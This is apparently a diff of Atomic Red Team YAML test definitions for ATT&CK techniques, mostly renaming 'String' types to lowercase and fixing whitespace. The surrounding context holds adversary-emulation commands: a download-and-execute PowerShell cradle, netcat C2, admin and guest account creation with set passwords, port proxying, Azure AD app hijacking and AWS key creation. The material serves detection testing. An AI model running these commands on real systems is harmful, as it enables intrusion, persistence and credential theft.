@@ -34,24 +34,24 @@ atomic_tests:
input_arguments:
domain:
description: Default domain to simulate against
type: String
type: string
default: www.google.com
curl_path:
description: path to curl.exe
type: Path
type: path
default: C:\Windows\System32\Curl.exe
dependency_executor_name: powershell
dependencies:
- description: |
Curl must be installed on system
prereq_command: |
if (Test-Path #{curl_path}) {exit 0} else {exit 1}
get_prereq_command: |
Invoke-WebRequest "https://curl.haxx.se/windows/dl-7.71.1/curl-7.71.1-win32-mingw.zip" -Outfile $env:temp\curl.zip
Expand-Archive -Path $env:temp\curl.zip -DestinationPath $env:temp\curl
Copy-Item $env:temp\curl\curl-7.71.1-win32-mingw\bin\curl.exe #{curl_path}
Remove-Item $env:temp\curl
Remove-Item $env:temp\curl.zip
dependency_executor_name: powershell
dependencies:
- description: |
Curl must be installed on system
prereq_command: |
if (Test-Path #{curl_path}) {exit 0} else {exit 1}
get_prereq_command: |
Invoke-WebRequest "https://curl.haxx.se/windows/dl-7.71.1/curl-7.71.1-win32-mingw.zip" -Outfile $env:temp\curl.zip
Expand-Archive -Path $env:temp\curl.zip -DestinationPath $env:temp\curl
Copy-Item $env:temp\curl\curl-7.71.1-win32-mingw\bin\curl.exe #{curl_path}
Remove-Item $env:temp\curl
Remove-Item $env:temp\curl.zip
executor:
command: |
#{curl_path} -s -A "HttpBrowser/1.0" -m3 #{domain} >nul 2>&1
@@ -70,7 +70,7 @@ atomic_tests:
input_arguments:
domain:
description: Default domain to simulate against
type: String
type: string
default: www.google.com
executor:
command: |
atomics/T1071.004/T1071.004.yaml
+15 -15
View File
@@ -12,19 +12,19 @@ atomic_tests:
input_arguments:
query_type:
description: DNS query type
type: String
type: string
default: TXT
subdomain:
description: Subdomain prepended to the domain name
type: String
type: string
default: atomicredteam
query_volume:
description: Number of DNS queries to send
type: Integer
type: integer
default: 1000
domain:
description: Default domain to simulate against
type: String
type: string
default: 127.0.0.1.xip.io
executor:
command: |
@@ -41,27 +41,27 @@ atomic_tests:
input_arguments:
runtime:
description: Time in minutes to run the simulation
type: Integer
type: integer
default: 30
domain:
description: Default domain to simulate against
type: String
type: string
default: 127.0.0.1.xip.io
subdomain:
description: Subdomain prepended to the domain name
type: String
type: string
default: atomicredteam
query_type:
description: DNS query type
type: String
type: string
default: TXT
c2_interval:
description: Seconds between C2 requests to the command and control server
type: Integer
type: integer
default: 30
c2_jitter:
description: Percentage of jitter to add to the C2 interval to create variance in the times between C2 requests
type: Integer
type: integer
default: 20
executor:
command: |
@@ -79,15 +79,15 @@ atomic_tests:
input_arguments:
query_type:
description: DNS query type
type: String
type: string
default: TXT
subdomain:
description: Subdomain prepended to the domain name (should be 63 characters to test maximum length)
type: String
type: string
default: atomicredteamatomicredteamatomicredteamatomicredteamatomicredte
domain:
description: Default domain to simulate against
type: String
type: string
default: 127.0.0.1.xip.io
executor:
command: |
@@ -108,11 +108,11 @@ atomic_tests:
input_arguments:
domain:
description: Domain Name configured to use DNS Server where your C2 listener is running
type: String
type: string
default: example.com
server_ip:
description: IP address of DNS server where your C2 listener is running
type: String
type: string
default: 127.0.0.1
executor:
command: |
atomics/T1072/T1072.yaml
+30 -32
View File
@@ -1,68 +1,66 @@
attack_technique: T1072
display_name: Software Deployment Tools
atomic_tests:
- name: Radmin Viewer Utility
- name: Radmin Viewer Utility
auto_generated_guid: b4988cad-6ed2-434d-ace5-ea2670782129
description: |
An adversary may use Radmin Viewer Utility to remotely control Windows device, this will start the radmin console.
supported_platforms:
- windows
- windows
input_arguments:
radmin_installer:
description: Radmin Viewer installer
type: Path
type: path
default: 'RadminViewer.msi'
radmin_exe:
description: The radmin.exe executable from RadminViewer.msi
type: Path
type: path
default: 'Radmin Viewer 3/Radmin.exe'
dependency_executor_name: powershell
dependencies:
- description: |
Radmin Viewer Utility must be installed at specified location (#{radmin_exe})
prereq_command: |
if (Test-Path "${env:ProgramFiles(x86)}/#{radmin_exe}") {exit 0} else {exit 1}
get_prereq_command: |
Write-Host Downloading radmin installer
(New-Object Net.WebClient).DownloadFile("https://www.radmin.com/download/Radmin_Viewer_3.5.2.1_EN.msi","$ENV:Temp\#{radmin_installer}")
Write-Host Install Radmin
Start-Process msiexec -Wait -ArgumentList /i , $ENV:Temp\#{radmin_installer}, /qn
- description: |
Radmin Viewer Utility must be installed at specified location (#{radmin_exe})
prereq_command: |
if (Test-Path "${env:ProgramFiles(x86)}/#{radmin_exe}") {exit 0} else {exit 1}
get_prereq_command: |
Write-Host Downloading radmin installer
(New-Object Net.WebClient).DownloadFile("https://www.radmin.com/download/Radmin_Viewer_3.5.2.1_EN.msi","$ENV:Temp\#{radmin_installer}")
Write-Host Install Radmin
Start-Process msiexec -Wait -ArgumentList /i , $ENV:Temp\#{radmin_installer}, /qn
executor:
name: command_prompt
elevation_required: true
command: |
elevation_required: true
command: |
"%PROGRAMFILES(x86)%/#{radmin_exe}"
- name: PDQ Deploy RAT
auto_generated_guid: e447b83b-a698-4feb-bed1-a7aaf45c3443
description: |
An adversary may use PDQ Deploy Software to deploy the Remote Adminstartion Tool, this will start the PDQ console.
supported_platforms:
- windows
- windows
input_arguments:
PDQ_Deploy_installer:
description: PDQ Deploy Install
type: Path
type: path
default: 'PDQDeploysetup.exe'
PDQ_Deploy_exe:
description: The PDQDeployConsole.exe executable from PDQDeploysetup.exe
type: Path
type: path
default: 'Admin Arsenal/PDQ Deploy/PDQDeployConsole.exe'
dependency_executor_name: powershell
dependencies:
- description: |
PDQ Deploy will be installed at specified location (#{PDQ_Deploy_exe})
prereq_command: |
if (Test-Path "${env:ProgramFiles(x86)}/#{PDQ_Deploy_exe}") {exit 0} else {exit 1}
get_prereq_command: |
Write-Host Downloading PDQ Deploy installer
(New-Object Net.WebClient).DownloadFile("https://download.pdq.com/release/19/Deploy_19.3.350.0.exe","$ENV:Temp\#{PDQ_Deploy_installer}")
Write-Host Install PDQ Deploy
Start-Process $ENV:Temp\#{PDQ_Deploy_installer} -Wait -ArgumentList "/s"
- description: |
PDQ Deploy will be installed at specified location (#{PDQ_Deploy_exe})
prereq_command: |
if (Test-Path "${env:ProgramFiles(x86)}/#{PDQ_Deploy_exe}") {exit 0} else {exit 1}
get_prereq_command: |
Write-Host Downloading PDQ Deploy installer
(New-Object Net.WebClient).DownloadFile("https://download.pdq.com/release/19/Deploy_19.3.350.0.exe","$ENV:Temp\#{PDQ_Deploy_installer}")
Write-Host Install PDQ Deploy
Start-Process $ENV:Temp\#{PDQ_Deploy_installer} -Wait -ArgumentList "/s"
executor:
name: command_prompt
elevation_required: true
command: |
elevation_required: true
command: |
"%PROGRAMFILES(x86)%/#{PDQ_Deploy_exe}"
atomics/T1074.001/T1074.001.yaml
+4 -5
View File
@@ -11,7 +11,7 @@ atomic_tests:
input_arguments:
output_file:
description: Location to save downloaded discovery.bat file
type: Path
type: path
default: $env:TEMP\discovery.bat
executor:
command: |
@@ -29,7 +29,7 @@ atomic_tests:
input_arguments:
output_file:
description: Location to save downloaded discovery.bat file
type: Path
type: path
default: /tmp/T1074.001_discovery.log
executor:
command: |
@@ -45,11 +45,11 @@ atomic_tests:
input_arguments:
output_file:
description: Location to save zipped file or folder
type: Path
type: path
default: $env:TEMP\Folder_to_zip.zip
input_file:
description: Location of file or folder to zip
type: Path
type: path
default: PathToAtomicsFolder\T1074.001\bin\Folder_to_zip
executor:
command: |
@@ -57,4 +57,3 @@ atomic_tests:
cleanup_command: |
Remove-Item -Path #{output_file} -ErrorAction Ignore
name: powershell
atomics/T1078.001/T1078.001.yaml
+8 -8
View File
@@ -11,23 +11,23 @@ atomic_tests:
input_arguments:
guest_user:
description: Specify the guest account
type: String
type: string
default: guest
guest_password:
description: Specify the guest password
type: String
type: string
default: Password123!
local_admin_group:
description: Specify the admin localgroup name
type: String
type: string
default: Administrators
remote_desktop_users_group_name:
description: Specify the remote desktop users group name
type: String
type: string
default: Remote Desktop Users
remove_rdp_access_during_cleanup:
description: Set to 1 if you want the cleanup to remove RDP access to machine
type: Integer
type: integer
default: 0
executor:
command: |-
@@ -56,13 +56,13 @@ atomic_tests:
input_arguments:
guest_user:
description: Specify the guest account
type: String
type: string
default: guest
executor:
command: |
net user #{guest_user} /active:yes
net user #{guest_user} /active:yes
cleanup_command: |
net user #{guest_user} /active:no
net user #{guest_user} /active:no
name: command_prompt
elevation_required: true
atomics/T1078.003/T1078.003.yaml
+3 -3
View File
@@ -10,7 +10,7 @@ atomic_tests:
input_arguments:
password:
description: Password for art-test user
type: String
type: string
default: -4RTisCool!-321
executor:
command: |-
@@ -22,7 +22,7 @@ atomic_tests:
net user art-test /delete >nul 2>&1
name: command_prompt
elevation_required: true
- name: Create local account with admin privileges - MacOS
auto_generated_guid: f1275566-1c26-4b66-83e3-7f9f7f964daa
description: After execution the new account will be active and added to the Administrators group
@@ -42,7 +42,7 @@ atomic_tests:
sudo dscl . -delete /Users/AtomicUser
name: bash
elevation_required: true
- name: WinPwn - Loot local Credentials - powerhell kittie
- name: WinPwn - Loot local Credentials - powerhell kittie
auto_generated_guid: 9e9fd066-453d-442f-88c1-ad7911d32912
description: Loot local Credentials - powerhell kittie technique via function of WinPwn
supported_platforms:
atomics/T1078.004/T1078.004.yaml
+12 -15
View File
@@ -1,4 +1,3 @@
---
attack_technique: T1078.004
display_name: 'Valid Accounts: Cloud Accounts'
@@ -9,28 +8,28 @@ atomic_tests:
GCP Service Accounts can be used to gain intial access as well as maintain persistence inside Google Cloud.
supported_platforms:
- google-workspace
- iaas:gcp
- google-workspace
- iaas:gcp
input_arguments:
project-id:
description: ID of the project, you want to create service account as well as service account key for
type: String
type: string
default: art-project-1
service-account-name:
description: Name of the service account
type: String
type: string
default: gcp-art-service-account-1
service-account-email:
description: Email of the service account
type: String
type: string
default: gcp-art-service-account-1@art-project-1.iam.gserviceaccount.com
output-key-file:
description: Email of the service account
type: String
type: string
default: gcp-art-service-account-1.json
executor:
@@ -46,11 +45,9 @@ atomic_tests:
dependency_executor_name: sh
dependencies:
- description: |
Requires gcloud
prereq_command: |
if [ -x "$(command -v gcloud)" ]; then exit 0; else exit 1; fi;
get_prereq_command: |
echo "Please Install Google Cloud SDK before running this atomic test : https://cloud.google.com/sdk/docs/install"
- description: |
Requires gcloud
prereq_command: |
if [ -x "$(command -v gcloud)" ]; then exit 0; else exit 1; fi;
get_prereq_command: |
echo "Please Install Google Cloud SDK before running this atomic test : https://cloud.google.com/sdk/docs/install"
atomics/T1082/T1082.yaml
+20 -21
View File
@@ -33,7 +33,7 @@ atomic_tests:
input_arguments:
output_file:
description: Output file used to store the results.
type: Path
type: path
default: /tmp/T1082.txt
executor:
command: |
@@ -119,17 +119,17 @@ atomic_tests:
input_arguments:
vbscript:
description: Path to sample script
type: String
type: string
default: PathToAtomicsFolder\T1082\src\griffon_recon.vbs
dependency_executor_name: powershell
dependencies:
- description: |
Sample script file must exist on disk at specified location (#{vbscript})
prereq_command: |
if (Test-Path #{vbscript}) {exit 0} else {exit 1}
get_prereq_command: |
New-Item -Type Directory (split-path #{vbscript}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1082/src/griffon_recon.vbs" -OutFile "#{vbscript}"
- description: |
Sample script file must exist on disk at specified location (#{vbscript})
prereq_command: |
if (Test-Path #{vbscript}) {exit 0} else {exit 1}
get_prereq_command: |
New-Item -Type Directory (split-path #{vbscript}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1082/src/griffon_recon.vbs" -OutFile "#{vbscript}"
executor:
command: 'cscript #{vbscript}'
name: powershell
@@ -167,7 +167,7 @@ atomic_tests:
name: sh
- name: WinPwn - winPEAS
auto_generated_guid: eea1d918-825e-47dd-acc2-814d6c58c0e1
description: Discover Local Privilege Escalation possibilities using winPEAS function of WinPwn
description: Discover Local Privilege Escalation possibilities using winPEAS function of WinPwn
supported_platforms:
- windows
executor:
@@ -178,7 +178,7 @@ atomic_tests:
name: powershell
- name: WinPwn - itm4nprivesc
auto_generated_guid: 3d256a2f-5e57-4003-8eb6-64d91b1da7ce
description: Discover Local Privilege Escalation possibilities using itm4nprivesc function of WinPwn
description: Discover Local Privilege Escalation possibilities using itm4nprivesc function of WinPwn
supported_platforms:
- windows
executor:
@@ -189,7 +189,7 @@ atomic_tests:
name: powershell
- name: WinPwn - Powersploits privesc checks
auto_generated_guid: 345cb8e4-d2de-4011-a580-619cf5a9e2d7
description: Powersploits privesc checks using oldchecks function of WinPwn
description: Powersploits privesc checks using oldchecks function of WinPwn
supported_platforms:
- windows
executor:
@@ -206,7 +206,7 @@ atomic_tests:
name: powershell
- name: WinPwn - General privesc checks
auto_generated_guid: 5b6f39a2-6ec7-4783-a5fd-2c54a55409ed
description: General privesc checks using the otherchecks function of WinPwn
description: General privesc checks using the otherchecks function of WinPwn
supported_platforms:
- windows
executor:
@@ -249,7 +249,7 @@ atomic_tests:
RBCD-Check -consoleoutput -noninteractive
name: powershell
- name: WinPwn - PowerSharpPack - Watson searching for missing windows patches
- name: WinPwn - PowerSharpPack - Watson searching for missing windows patches
auto_generated_guid: 07b18a66-6304-47d2-bad0-ef421eb2e107
description: PowerSharpPack - Watson searching for missing windows patches technique via function of WinPwn
supported_platforms:
@@ -269,12 +269,12 @@ atomic_tests:
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-SharpUp.ps1')
Invoke-SharpUp -command "audit"
name: powershell
- name: WinPwn - PowerSharpPack - Seatbelt
- name: WinPwn - PowerSharpPack - Seatbelt
auto_generated_guid: 5c16ceb4-ba3a-43d7-b848-a13c1f216d95
description: |-
PowerSharpPack - Seatbelt technique via function of WinPwn.
[Seatbelt](https://github.com/GhostPack/Seatbelt) is a C# project that performs a number of security oriented host-survey "safety checks" relevant from both offensive and defensive security perspectives.
supported_platforms:
- windows
@@ -294,11 +294,11 @@ atomic_tests:
input_arguments:
username:
description: Azure AD username
type: String
default: null
type: string
default:
password:
description: Azure AD password
type: String
type: string
default: T1082Az
dependency_executor_name: powershell
dependencies:
@@ -369,4 +369,3 @@ atomic_tests:
wmic OS get Caption,OSArchitecture,Version
wmic DISKDRIVE get Caption
name: command_prompt
atomics/T1083/T1083.yaml
+9 -9
View File
@@ -9,9 +9,9 @@ atomic_tests:
- windows
input_arguments:
output_file:
description: File to output results to
type: String
default: '%temp%\T1083Test1.txt'
description: File to output results to
type: string
default: '%temp%\T1083Test1.txt'
executor:
command: |
dir /s c:\ >> #{output_file}
@@ -52,7 +52,7 @@ atomic_tests:
input_arguments:
output_file:
description: Output file used to store the results.
type: Path
type: path
default: /tmp/T1083.txt
executor:
command: |
@@ -77,7 +77,7 @@ atomic_tests:
input_arguments:
output_file:
description: Output file used to store the results.
type: Path
type: path
default: /tmp/T1083.txt
executor:
command: |
@@ -99,7 +99,7 @@ atomic_tests:
input_arguments:
File_to_output:
description: File to output results to
type: String
type: string
default: $env:temp\T1083Test5.txt
executor:
command: |
@@ -116,19 +116,19 @@ atomic_tests:
cat #{File_to_output}
cleanup_command: |
remove-item #{File_to_output} -ErrorAction SilentlyContinue
name: powershell
name: powershell
- name: Launch DirLister Executable
auto_generated_guid: c5bec457-43c9-4a18-9a24-fe151d8971b7
description: |-
Launches the DirLister executable for a short period of time and then exits.
Recently seen used by [BlackCat ransomware](https://news.sophos.com/en-us/2022/07/14/blackcat-ransomware-attacks-not-merely-a-byproduct-of-bad-luck/) to create a list of accessible directories and files.
supported_platforms:
- windows
input_arguments:
dirlister_path:
description: 'Path to the DirLister executable '
type: String
type: string
default: PathToAtomicsFolder\T1083\bin\DirLister.exe
dependency_executor_name: powershell
dependencies:
atomics/T1087.001/T1087.001.yaml
+4 -4
View File
@@ -10,7 +10,7 @@ atomic_tests:
input_arguments:
output_file:
description: Path where captured results will be placed
type: Path
type: path
default: /tmp/T1087.001.txt
executor:
command: |
@@ -29,7 +29,7 @@ atomic_tests:
input_arguments:
output_file:
description: Path where captured results will be placed
type: Path
type: path
default: /tmp/T1087.001.txt
executor:
command: |
@@ -49,7 +49,7 @@ atomic_tests:
input_arguments:
output_file:
description: Path where captured results will be placed
type: Path
type: path
default: /tmp/T1087.001.txt
executor:
command: |
@@ -86,7 +86,7 @@ atomic_tests:
input_arguments:
output_file:
description: Path where captured results will be placed
type: Path
type: path
default: /tmp/T1087.001.txt
dependency_executor_name: sh
dependencies:
atomics/T1087.002/T1087.002.yaml
+11 -11
View File
@@ -34,7 +34,7 @@ atomic_tests:
input_arguments:
computer_name:
description: Name of remote system to query
type: String
type: string
default: "%COMPUTERNAME%"
executor:
command: |
@@ -50,7 +50,7 @@ atomic_tests:
input_arguments:
adrecon_path:
description: Path of ADRecon.ps1 file
type: Path
type: path
default: $env:TEMP\ADRecon.ps1
dependency_executor_name: powershell
dependencies:
@@ -77,7 +77,7 @@ atomic_tests:
input_arguments:
adfind_path:
description: Path to the AdFind executable
type: Path
type: path
default: PathToAtomicsFolder\T1087.002\src\AdFind.exe
dependency_executor_name: powershell
dependencies:
@@ -101,7 +101,7 @@ atomic_tests:
input_arguments:
adfind_path:
description: Path to the AdFind executable
type: Path
type: path
default: PathToAtomicsFolder\T1087.002\src\AdFind.exe
dependency_executor_name: powershell
dependencies:
@@ -125,7 +125,7 @@ atomic_tests:
input_arguments:
adfind_path:
description: Path to the AdFind executable
type: Path
type: path
default: PathToAtomicsFolder\T1087.002\src\AdFind.exe
dependency_executor_name: powershell
dependencies:
@@ -149,7 +149,7 @@ atomic_tests:
input_arguments:
adfind_path:
description: Path to the AdFind executable
type: Path
type: path
default: PathToAtomicsFolder\T1087.002\src\AdFind.exe
dependency_executor_name: powershell
dependencies:
@@ -186,11 +186,11 @@ atomic_tests:
input_arguments:
domain:
description: Domain FQDN
type: String
type: string
default: $env:UserDnsDomain
uac_prop:
description: UAC Property to search
type: String
type: string
default: 524288
dependencies:
- description: |
@@ -282,13 +282,13 @@ atomic_tests:
supported_platforms:
- windows
input_arguments:
Domain:
Domain:
description: Domain that is being tested against
type: String
type: string
default: $env:USERDOMAIN
DomainController:
description: Domain Controller that is being tested against
type: String
type: string
default: $env:UserDnsDomain
dependency_executor_name: powershell
dependencies:
atomics/T1090.001/T1090.001.yaml
+10 -10
View File
@@ -13,11 +13,11 @@ atomic_tests:
input_arguments:
proxy_server:
description: Proxy server URL (host:port)
type: Url
type: url
default: 127.0.0.1:8080
proxy_scheme:
description: Protocol to proxy (http or https)
type: String
type: string
default: http
executor:
command: |
@@ -31,22 +31,22 @@ atomic_tests:
description: |
Enable traffic redirection on macOS UI (not terminal).
The test will modify and enable the "Web Proxy" and "Secure Web Proxy" settings in System Preferences => Network => Advanced => Proxies for the specified network interface.
Note that this test may conflict with pre-existing system configuration.
supported_platforms:
- macos
- macos
input_arguments:
proxy_server:
description: Proxy server URL (host)
type: Url
type: url
default: 127.0.0.1
proxy_port:
description: Proxy server port
type: Integer
type: integer
default: 8080
interface:
description: Protocol to proxy (http or https)
type: String
type: string
default: Wi-Fi
executor:
name: sh
@@ -67,15 +67,15 @@ atomic_tests:
input_arguments:
connectaddress:
description: Specifies the IPv4 address to which to connect. Acceptable values are IP address, computer NetBIOS name, or computer DNS name. If an address is not specified, the default is the local computer.
type: String
type: string
default: 127.0.0.1
connectport:
description: Specifies the IPv4 port, by port number or service name, to which to connect. If connectport is not specified, the default is the value of listenport on the local computer.
type: String
type: string
default: "1337"
listenport:
description: Specifies the IPv4 port, by port number or service name, on which to listen.
type: String
type: string
default: "1337"
executor:
command: netsh interface portproxy add v4tov4 listenport=#{listenport} connectport=#{connectport} connectaddress=#{connectaddress}
atomics/T1090.003/T1090.003.yaml
+37 -37
View File
@@ -11,29 +11,29 @@ atomic_tests:
http://s3.amazonaws.com/0ubz-2q11-gi9y/en.html
https://psiphon.ca/faq.html
supported_platforms:
- windows
dependency_executor_name: powershell
- windows
dependency_executor_name: powershell
dependencies:
- description: |
The proxy settings backup file must exist on disk at $env:Temp\proxy-backup.txt
prereq_command: |
if (Test-Path $env:Temp\proxy-backup.txt) {exit 0} else {exit 1}
get_prereq_command: |
if(-not (test-path $env:Temp\proxy-backup.txt)){
$Proxy = (Get-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings' -Name "ProxyServer" -ErrorAction Ignore).ProxyServer
Set-Content $env:Temp\proxy-backup.txt $Proxy}
- description: |
The Psiphon executable must exist in the Downloads folder
prereq_command: |
if (Test-Path $env:UserProfile\Downloads\psiphon3.exe) {exit 0} else {exit 1}
get_prereq_command: |
Invoke-WebRequest -OutFile "$env:UserProfile\Downloads\psiphon3.exe" "https://s3.amazonaws.com/0ubz-2q11-gi9y/psiphon3.exe"
- description: |
Batch file containing commands to run must be in src directory
prereq_command: |
if (Test-Path PathToAtomicsFolder\T1090.003\src\Psiphon.bat) {exit 0} else {exit 1}
get_prereq_command: |
Invoke-WebRequest -OutFile "PathToAtomicsFolder\T1090.003\src\Psiphon.bat" "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1090.003/src/Psiphon.bat"
- description: |
The proxy settings backup file must exist on disk at $env:Temp\proxy-backup.txt
prereq_command: |
if (Test-Path $env:Temp\proxy-backup.txt) {exit 0} else {exit 1}
get_prereq_command: |
if(-not (test-path $env:Temp\proxy-backup.txt)){
$Proxy = (Get-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings' -Name "ProxyServer" -ErrorAction Ignore).ProxyServer
Set-Content $env:Temp\proxy-backup.txt $Proxy}
- description: |
The Psiphon executable must exist in the Downloads folder
prereq_command: |
if (Test-Path $env:UserProfile\Downloads\psiphon3.exe) {exit 0} else {exit 1}
get_prereq_command: |
Invoke-WebRequest -OutFile "$env:UserProfile\Downloads\psiphon3.exe" "https://s3.amazonaws.com/0ubz-2q11-gi9y/psiphon3.exe"
- description: |
Batch file containing commands to run must be in src directory
prereq_command: |
if (Test-Path PathToAtomicsFolder\T1090.003\src\Psiphon.bat) {exit 0} else {exit 1}
get_prereq_command: |
Invoke-WebRequest -OutFile "PathToAtomicsFolder\T1090.003\src\Psiphon.bat" "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1090.003/src/Psiphon.bat"
executor:
name: powershell
command: |
@@ -52,8 +52,8 @@ atomic_tests:
- windows
input_arguments:
TorExe:
description: Location of tor.exe file.
type: String
description: Location of tor.exe file.
type: string
default: $env:temp\tor\Tor\tor.exe
dependency_executor_name: powershell
dependencies:
@@ -66,9 +66,9 @@ atomic_tests:
expand-archive -LiteralPath "$env:temp\tor.zip" -DestinationPath "$env:temp\tor"
executor:
command: |
invoke-expression 'cmd /c start powershell -Command {cmd /c #{TorExe}}'
sleep -s 60
stop-process -name "tor" | out-null
invoke-expression 'cmd /c start powershell -Command {cmd /c #{TorExe}}'
sleep -s 60
stop-process -name "tor" | out-null
name: powershell
elevation_required: false
- name: Tor Proxy Usage - Debian/Ubuntu
@@ -81,16 +81,16 @@ atomic_tests:
dependency_executor_name: sh
dependencies:
- description: |
Tor must be installed on the machine
Tor must be installed on the machine
prereq_command: |
if [ -x "$(command -v tor --version)" ]; then exit 0; else exit 1; fi
if [ -x "$(command -v tor --version)" ]; then exit 0; else exit 1; fi
get_prereq_command: |
sudo apt-get -y install tor
sudo apt-get -y install tor
executor:
command: |
sudo systemctl start tor
sudo systemctl start tor
cleanup_command: |
sudo systemctl stop tor
sudo systemctl stop tor
name: sh
- name: Tor Proxy Usage - MacOS
auto_generated_guid: 12631354-fdbc-4164-92be-402527e748da
@@ -102,15 +102,15 @@ atomic_tests:
dependency_executor_name: sh
dependencies:
- description: |
Tor must be installed on the machine
Tor must be installed on the machine
prereq_command: |
if [ -x "$(command -v tor --version)" ]; then exit 0; else exit 1; fi
if [ -x "$(command -v tor --version)" ]; then exit 0; else exit 1; fi
get_prereq_command: |
if [ ! -x "$(command -v brew --version)" ]; then /bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh keystroke return)"; fi
brew install tor
executor:
command: |
osascript -e 'tell application "Terminal" to do script "tor"'
osascript -e 'tell application "Terminal" to do script "tor"'
cleanup_command: |
killall tor > /dev/null 2>&1
name: sh
killall tor > /dev/null 2>&1
name: sh
atomics/T1095/T1095.yaml
+8 -8
View File
@@ -11,7 +11,7 @@ atomic_tests:
input_arguments:
server_ip:
description: The IP address of the listening server
type: String
type: string
default: 127.0.0.1
executor:
command: |
@@ -19,7 +19,7 @@ atomic_tests:
Invoke-PowerShellIcmp -IPAddress #{server_ip}
name: powershell
- name: Netcat C2
auto_generated_guid: bcf0d1c1-3f6a-4847-b1c9-7ed4ea321f37
auto_generated_guid: bcf0d1c1-3f6a-4847-b1c9-7ed4ea321f37
description: |
Start C2 Session Using Ncat
To start the listener on a Linux device, type the following:
@@ -29,19 +29,19 @@ atomic_tests:
input_arguments:
server_port:
description: The port for the C2 connection
type: Integer
type: integer
default: 80
ncat_exe:
description: The location of ncat.exe
type: Path
type: path
default: $env:TEMP\T1095\nmap-7.80\ncat.exe
ncat_path:
description: The folder path of ncat.exe
type: Path
type: path
default: $env:TEMP\T1095
server_ip:
description: The IP address or domain name of the listening server
type: String
type: string
default: 127.0.0.1
dependency_executor_name: powershell
dependencies:
@@ -74,11 +74,11 @@ atomic_tests:
input_arguments:
server_ip:
description: The IP address or domain name of the listening server
type: String
type: string
default: 127.0.0.1
server_port:
description: The port for the C2 connection
type: Integer
type: integer
default: 80
executor:
command: |
atomics/T1098.001/T1098.001.yaml
+21 -21
View File
@@ -12,23 +12,23 @@ atomic_tests:
input_arguments:
username:
description: Azure AD username
type: String
type: string
default: jonh@contoso.com
password:
description: Azure AD password
type: String
type: string
default: p4sswd
service_principal_name:
description: Name of the targeted service principal
type: String
type: string
default: SuperSP
certificate_password:
description: Password of the new certificate
type: String
type: string
default: Passw0rd
path_to_cert:
description: Path of the new certificate, locally stored
type: String
description: Path of the new certificate, locally stored
type: string
default: $env:TEMP
dependency_executor_name: powershell
dependencies:
@@ -83,7 +83,7 @@ atomic_tests:
}
Get-ChildItem -Path Cert:\CurrentUser\My | where { $_.FriendlyName -eq "AtomicCert" } | Remove-Item
rm "#{path_to_cert}\#{service_principal_name}.pfx" -ErrorAction Ignore
name: powershell
elevation_required: false
- name: Azure AD Application Hijacking - App Registration
@@ -97,23 +97,23 @@ atomic_tests:
input_arguments:
username:
description: Azure AD username
type: String
type: string
default: jonh@contoso.com
password:
description: Azure AD password
type: String
type: string
default: p4sswd
application_name:
description: Name of the targeted application
type: String
description: Name of the targeted application
type: string
default: SuperApp
certificate_password:
description: Password of the new certificate
type: String
type: string
default: Passw0rd
path_to_cert:
description: Path of the new certificate, locally stored
type: String
description: Path of the new certificate, locally stored
type: string
default: $env:TEMP
dependency_executor_name: powershell
dependencies:
@@ -178,15 +178,15 @@ atomic_tests:
input_arguments:
username:
description: Create new AWS access and secret keys for the user
type: String
type: string
default: "atomicredteam"
dependencies:
- description: |
Check if the user exists.
prereq_command: |
aws iam list-users | grep #{username}
get_prereq_command: |
echo Please run atomic test T1136.003, before running this atomic
- description: |
Check if the user exists.
prereq_command: |
aws iam list-users | grep #{username}
get_prereq_command: |
echo Please run atomic test T1136.003, before running this atomic
executor:
command: |
aws iam create-access-key --user-name #{username} > $PathToAtomicsFolder/T1098.001/bin/aws_secret.creds
atomics/T1098/T1098.yaml
+47 -47
View File
@@ -41,7 +41,7 @@ atomic_tests:
auto_generated_guid: a55a22e9-a3d3-42ce-bd48-2653adb8f7a9
description: |
Create a random atr-nnnnnnnn account and add it to a domain group (by default, Domain Admins).
The quickest way to run it is against a domain controller, using `-Session` of `Invoke-AtomicTest`. Alternatively,
you need to install PS Module ActiveDirectory (in prereqs) and run the script with appropriare AD privileges to
create the user and alter the group. Automatic installation of the dependency requires an elevated session,
@@ -59,15 +59,15 @@ atomic_tests:
description: |
Prefix string of the random username (by default, atr-). Because the cleanup deletes such account based on
a match `(&(samaccountname=#{account_prefix}-*)(givenName=Test))`, if you are to change it, be careful.
type: String
type: string
default: atr-
group:
description: Name of the group to alter
type: String
type: string
default: "Domain Admins"
create_args:
description: Additional string appended to New-ADUser call
type: String
description: Additional string appended to New-ADUser call
type: string
default: ""
dependencies:
- description: |
@@ -110,15 +110,15 @@ atomic_tests:
input_arguments:
username:
description: Name of the AWS group to create
type: String
type: string
default: "atomicredteam"
dependencies:
- description: |
Check if the user exists, we can only add a user to a group if the user exists.
prereq_command: |
aws iam list-users | grep #{username}
get_prereq_command: |
echo Please run atomic test T1136.003, before running this atomic test
- description: |
Check if the user exists, we can only add a user to a group if the user exists.
prereq_command: |
aws iam list-users | grep #{username}
get_prereq_command: |
echo Please run atomic test T1136.003, before running this atomic test
executor:
command: |
aws iam create-group --group-name #{username}
@@ -135,7 +135,7 @@ atomic_tests:
may be interested primarily in highly privileged roles, e.g. Global Administrator, Application Administrator,
Privileged authentication administrator (this role can reset Global Administrator password!).
By default, the role Global Reader is assigned to service principal in this test.
The account you use to run the PowerShell command should have Privileged Role Administrator or Global Administrator role in your Azure AD.
Detection hint - check Activity "Add member to role" in Azure AD Audit Logs. In targer you will also see User as a type.
@@ -144,20 +144,20 @@ atomic_tests:
input_arguments:
username:
description: Azure AD username
type: String
type: string
default: jonh@contoso.com
password:
description: Azure AD password
type: String
type: string
default: p4sswd
user_principal_name:
description: Name of the targeted user (user principal)
type: String
type: string
default: SuperUser
role_name:
description: Name of the targed Azure AD role
type: String
default: Global Reader
type: string
default: Global Reader
dependencies:
- description: |
AzureAD module must be installed.
@@ -188,7 +188,7 @@ atomic_tests:
if ($user -eq $null) { Write-Warning "User not found"; exit }
